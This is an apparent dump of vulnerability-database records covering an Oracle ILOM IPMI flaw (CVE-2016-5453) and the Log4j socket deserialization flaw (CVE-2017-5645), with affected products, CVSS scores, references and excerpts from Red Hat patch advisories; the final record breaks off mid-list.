"2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003879", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, cve: "CVE-2016-5453", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5453", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94272", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2016-5453", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5453", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "CVE-2016-5453", trust: 0.8, value: "Critical", }, { author: "CNNVD", id: "CNNVD-201607-817", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94272", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5453", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'IPMI' protocol. The 'IPMI' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5453", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92014", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003879", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-817", trust: 0.7, }, { db: "VULHUB", id: "VHN-94272", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5453", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, id: "VAR-201607-0661", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94272", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:56:10.085000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63177", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5453", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5453", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92014", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5453", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5453", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94272", }, { db: "VULMON", id: "CVE-2016-5453", }, { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, { db: "JVNDB", id: "JVNDB-2016-003879", }, { db: "CNNVD", id: "CNNVD-201607-817", }, { db: "NVD", id: "CVE-2016-5453", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94272", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5453", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92014", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003879", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-817", }, { date: "2016-07-21T10:15:09.397000", db: "NVD", id: "CVE-2016-5453", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94272", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5453", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92014", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003879", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-817", }, { date: "2024-11-21T02:54:20.817000", db: "NVD", id: "CVE-2016-5453", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In IPMI Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003879", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92014", }, ], trust: 0.6, }, }
var-201704-1589
Vulnerability from variot
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Apache Log4j is prone to remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. Apache Log4j 2.0-alpha1 through 2.8.1 are vulnerable. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.1 Service Pack 1 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References. (CVE-2017-5645)
-
A vulnerability was discovered in tomcat's handling of pipelined requests when "Sendfile" was used. If sendfile processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could lead to invalid responses or information disclosure. (CVE-2017-5647)
-
A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-5664)
-
A vulnerability was discovered in tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application. (CVE-2017-5648)
-
Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):
1441205 - CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used 1441223 - CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1459158 - CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
- JIRA issues fixed (https://issues.jboss.org/):
JWS-657 - tomcat-native installs RHEL apr in addition to jbcs-httpd24-httpd-libs JWS-667 - Subject incorrectly removed from user session JWS-695 - tomcat7_t and tomcat8_t domains are in unconfined_domain JWS-709 - RPM missing selinux-policy dependency JWS-716 - Backport 60087 for Tomcat 8 JWS-717 - RFC 7230/3986 url requirement that prevents unencoded curly braces should be optional, since it breaks existing sites JWS-721 - CORS filter Vary header missing JWS-725 - /usr/share/tomcat7 needs world execute permissions to function on openshift v2 JWS-741 - Configurations in conf.d are not applied JWS-760 - [ASF BZ 59961] Provide an option to enable/disable processing of Class-Path entry in a jar's manifest file
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
bsh2: remote code execution via deserialization (CVE-2016-2510)
-
log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)
-
uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code (CVE-2017-15691)
-
mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
-
thrift: Improper Access Control grants access to files outside the webservers docroot path (CVE-2018-11798)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Installation instructions are available from the Fuse 7.3.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/
- Bugs fixed (https://bugzilla.redhat.com/):
1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization 1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability 1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code 1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) 1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path
- Description:
Red Hat JBoss BPM Suite is a business rules and processes management system for the management, storage, creation, modification, and deployment of JBoss rules and BPMN2-compliant business processes. (CVE-2017-5645)
-
It was found that XStream contains a vulnerability that allows a maliciously crafted file to be parsed successfully which could cause an application crash. The crash occurs if the file that is being fed into XStream input stream contains an instances of the primitive type 'void'. An attacker could use this flaw to create a denial of service on the target system. (CVE-2017-7957)
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: log4j security update Advisory ID: RHSA-2017:2423-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:2423 Issue date: 2017-08-07 CVE Names: CVE-2017-5645 =====================================================================
- Summary:
An update for log4j is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch Red Hat Enterprise Linux Client Optional (v. 7) - noarch Red Hat Enterprise Linux ComputeNode (v. 7) - noarch Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Enterprise Linux Server Optional (v. 7) - noarch Red Hat Enterprise Linux Workstation (v. 7) - noarch Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
- Description:
Log4j is a tool to help the programmer output log statements to a variety of output targets. (CVE-2017-5645)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-5645 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFZiCjVXlSAg2UNWIIRAgugAKCX6snTYMAdTmkK1uQ86MGQhkv7ugCdFILV uCPrjfU5EG2L7kIu/w1uCSA= =Fxz+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). (CVE-2017-5645)
-
A vulnerability was found in Jasypt that would allow an attacker to perform a timing attack on password hash comparison. (CVE-2014-9970)
-
It was found that an information disclosure flaw in Bouncy Castle could enable a local malicious application to gain access to user's private information. (CVE-2015-6644)
-
It was found that while parsing the SAML messages the StaxParserUtil class of Picketlink replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the "InResponseTo" field in the response. (CVE-2017-2582)
-
It was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue(). JIRA issues fixed (https://issues.jboss.org/):
JBEAP-11487 - jboss-ec2-eap for EAP 7.0.8
- (CVE-2017-7525)
Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201704-1589", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "utilities advanced spatial and operational analytics", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.7.0.1", }, { model: "tape library acsls", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.4", }, { model: "soa suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "soa suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.9", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.8", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.7", }, { model: "retail open commerce platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0.1", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: "oracle", version: "13.2", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: 